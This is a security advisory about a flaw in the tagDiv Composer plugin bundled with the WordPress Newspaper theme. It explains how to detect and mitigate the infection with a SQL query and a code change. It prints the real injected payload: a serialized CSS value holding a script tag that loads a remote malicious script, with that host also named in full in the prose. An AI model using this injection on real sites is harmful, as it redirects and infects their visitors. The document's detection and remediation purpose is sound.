Security Vulnerability in tagDiv Composer Plugin Packaged with WordPress Newspaper Theme Enables Database Rewrite
Security flaw with tagDiv Composer Plugin
Recently, a significant security flaw has been discovered in the tagDiv Composer plugin that comes bundled with the popular WordPress Newspaper theme. This vulnerability poses a serious risk as it allows attackers to rewrite the database, potentially compromising the integrity of WordPress websites.
How to Detect Traits of the Vulnerability
The malware inserts the following text into the td_live_css_local_storage key within the wp_options table of the database.
*Certain sections have been enclosed in parentheses to ensure safety.
a:2:{i:0;s:0:\"\";s:3:\"css\";s:175:\".stepkokkmnkivhrwppnn{} .step4636435346{}</style><script>var a=1;var b=2;var c=4;< ;/script><script src='https://four.startperfectsolutions[.]com/scripts/sold.js\'></script><style>\"}
The specified string is injected into the site header, subsequently leading to a site redirect to another destination.
The script located at https://four.startperfectsolutions.com/scripts/sold.js constitutes the core of the malware, orchestrating redirect hacks and other malevolent actions on the affected site. This script executes upon loading, initiating the harmful behavior.
How to Fix and deal with this malware
This malware exhibits an uncommon behavior by writing directly to the database. It specifically targets the key td_live_css_local_storage, likely exploiting a vulnerability within the tagDiv Composer plugin.
However, different malware types can modify databases in various ways. If a particular malware pattern is not recognized by our database, the plugin may not detect it.
In such scenarios, it becomes necessary to execute SQL statements directly on the database to assess the status of malware infection.
Example of SQL statement select option_value from wp_options where option_name = 'td_live_css_local_storage';
How to Mitigate?
The vulnerability described can potentially be mitigated by disabling the section of the plugin responsible for writing settings to the database.
This can be achieved by adding “//” at the beginning of the line within the file \wp-content\plugins\td-composer\css-live\includes\td_live_css_storage.php.
//update_option('td_live_css_local_storage', self::$local_storage);
However, this action may result in reduced functionality of the plugin as it will prevent the ability to save plugin settings.
Conclusion
The security vulnerability in the tagDiv Composer plugin highlights the importance of proactive website security practices. By staying vigilant, updating software regularly, and deploying robust security measures, website owners can protect their WordPress sites from potential threats and ensure a safe online environment for visitors.
Stay informed and take action to safeguard your WordPress website against security vulnerabilities like the one associated with the tagDiv Composer plugin. Your website’s security is paramount to maintaining trust and credibility in the digital landscape.